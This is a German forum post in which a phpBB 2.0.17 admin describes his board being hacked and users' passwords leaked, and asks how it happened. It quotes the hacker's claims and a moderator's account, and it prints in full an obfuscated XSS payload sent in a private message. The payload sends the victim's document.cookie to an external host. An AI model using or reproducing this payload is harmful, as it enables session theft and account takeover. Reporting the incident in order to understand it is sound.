mein 2.0.17 phpbb wurde gestern gehackt (nichts zesrtoert, aber Chaos angerichtet), wobei auch alle Passwoerter der User veroeffentlicht sind (unter andem auch mein eigenes!). Nun, meine Fragen, wie kam der Hacker an die Passwoerter ran, wenn nicht mal ich als Admin darauf Zugriff habe.
Hier Statements des Hackers:
die vulnerability habe ich ich in 4 tagen analyse selber gefunden, das entsprechende exploit selber gescripted. das dürfte somit die weltweit erste vulnerabilty sein, die ein 2.0.17 board effizient und unabhängig von umgebungsvariablen angreift. ich könnte die lücke
publishen, das wär sicher dickes fame aus der community, werd ich aber aus bestimmten gründen nicht machen.
Interessiert mich halt nur wegen der PWs.wie ich an die admin rechte komme:
indem ich einen overflow in einer
config datei ausgelöst habe, der es
mir erlaubte code einzuschleusen.
Von einem anderen Beteiligten (Mod) hat sich die Sache so abgespielt:
Zu der angesprochenen PM: Sie enthielt ein Bild mit diesem Code eingefuegt:soviel ich weiß hat [Hacker] [meine] hashes über ne pm durch javascript auf seinen webspace kopiert, hat dann mit nem md5(oderso) decoder unser all pw´s entschlüsselt und sie dann in der newsbar (die ich sofort gelöscht hatte, was aber nur zum entzug meiner rechte geführt hat) veröffentlicht.
Code: Alles auswählen
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top :expression(eval(this.sss));'sss=`i=new/**/Image( );i.src='http://mouze.org/bin/c.php?c='+document .cookie;this.sss=null`style='font-size:0; X="<B ">'</B>Was sagt ihr zu der ganzen Sache?
PS: Bitte keine Comments, dass ich auf die letzte Ver. upgraden soll...werde ich demnaechst machen.
